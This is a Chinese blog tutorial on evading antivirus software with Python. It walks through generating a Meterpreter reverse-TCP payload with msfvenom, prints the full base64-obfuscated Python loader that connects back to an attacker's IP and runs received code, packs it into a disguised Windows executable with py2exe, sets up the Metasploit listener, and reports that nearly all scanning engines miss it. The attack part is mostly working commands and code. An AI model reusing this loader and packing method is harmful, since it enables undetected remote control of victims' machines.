首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows,同时创建一个setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py,生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit,设置监听:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe,获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作,接下来对evil.exe进行在线病毒扫描,以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果:47款杀毒引擎中,只有一个引擎报毒,主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org 

参考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持!
如果你觉得本文对你有帮助,欢迎转载,烦请注明出处,谢谢!

使用Python进行防病毒免杀解析

- Author -

Bypass

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
django模型中的字段和model名显示为中文小技巧分享
Nov 18 Python
Python编程之event对象的用法实例分析
Mar 23 Python
Python字典操作详细介绍及字典内建方法分享
Jan 04 Python
Python实现备份MySQL数据库的方法示例
Jan 11 Python
python学习入门细节知识点
Mar 29 Python
python3使用SMTP发送HTML格式邮件
Jun 19 Python
Python 中Django验证码功能的实现代码
Jun 20 Python
Django app配置多个数据库代码实例
Dec 17 Python
基于Python数据分析之pandas统计分析
Mar 03 Python
python3读取autocad图形文件.py实例
Jun 05 Python
详解如何修改jupyter notebook的默认目录和默认浏览器
Jan 24 Python
Python加密与解密模块hashlib与hmac
Jun 05 Python
python 使用shutil复制图片的例子
Dec 13 #Python
基于python traceback实现异常的获取与处理
Dec 13 #Python
python 实现批量替换文本中的某部分内容
Dec 13 #Python
django多种支付、并发订单处理实例代码
Dec 13 #Python
Python+OpenCV+图片旋转并用原底色填充新四角的例子
Dec 12 #Python
Python+OpenCV 实现图片无损旋转90°且无黑边
Dec 12 #Python
使用python去除图片白色像素的实例
Dec 12 #Python
JAVA(88) 池化技术(1) 主题(1) FutureTask(3) ForkJoin(1) Repository接口(3) CompletableFuture(1) Springboot-cli(1) 线程池(1) Android(19)
You might like
PHP Undefined index报错的修复方法
2011/07/17 PHP
php实现cc攻击防御和防止快速刷新页面示例
2014/02/13 PHP
php读取flash文件高宽帧数背景颜色的方法
2015/01/06 PHP
CodeIgniter配置之SESSION用法实例分析
2016/01/19 PHP
php导出csv文件,可导出前导0实例代码
2016/11/16 PHP
php实现多维数组排序的方法示例
2017/03/23 PHP
php实现简单的权限管理的示例代码
2017/08/25 PHP
JavaScript 语法集锦 脚本之家基础推荐
2009/11/15 Javascript
Javascript动态绑定事件的简单实现代码
2010/12/25 Javascript
js读写cookie实现一个底部广告浮层效果的两种方法
2013/12/29 Javascript
使用Node.js实现一个简单的FastCGI服务器实例
2014/06/09 Javascript
JS+CSS实现Div弹出窗口同时背景变暗的方法
2015/03/04 Javascript
JavaScript实现DIV层拖动及动态增加新层的方法
2015/05/12 Javascript
js实现网页抽奖实例
2015/08/05 Javascript
Angular2  NgModule 模块详解
2016/10/19 Javascript
Vue代码分割懒加载的实现方法
2017/11/23 Javascript
Layui Table js 模拟选中checkbox的例子
2019/09/03 Javascript
jQuery实现获取多选框的值示例
2020/02/07 jQuery
《javascript设计模式》学习笔记四:Javascript面向对象程序设计链式调用实例分析
2020/04/07 Javascript
小程序中手机号识别的示例
2020/12/14 Javascript
[15:39]教你分分钟做大人:龙骑士
2014/10/30 DOTA
[01:27:30]LGD vs Newbee 2019国际邀请赛小组赛 BO2 第二场 8.16
2019/08/19 DOTA
[02:11]完美世界DOTA2联赛10月28日赛事精彩集锦:来吧展示实力强劲
2020/10/29 DOTA
[42:32]完美世界DOTA2联赛循环赛 Magma vs PXG BO2第二场 10.28
2020/10/28 DOTA
python实现的正则表达式功能入门教程【经典】
2017/06/05 Python
Django使用HttpResponse返回图片并显示的方法
2018/05/22 Python
django做form表单的数据验证过程详解
2019/07/26 Python
python tkinter实现彩球碰撞屏保
2019/07/30 Python
一行Python代码制作动态二维码的实现
2019/09/09 Python
FFT快速傅里叶变换的python实现过程解析
2019/10/21 Python
python cv2截取不规则区域图片实例
2019/12/21 Python
Python基于gevent实现高并发代码实例
2020/05/15 Python
2014年质量工作总结
2014/11/22 职场文书
2016元旦晚会主持人开场白和结束语
2015/12/03 职场文书
python可视化大屏库big_screen示例详解
2021/11/23 Python
详解Go语言中Get/Post请求测试
2022/06/01 Golang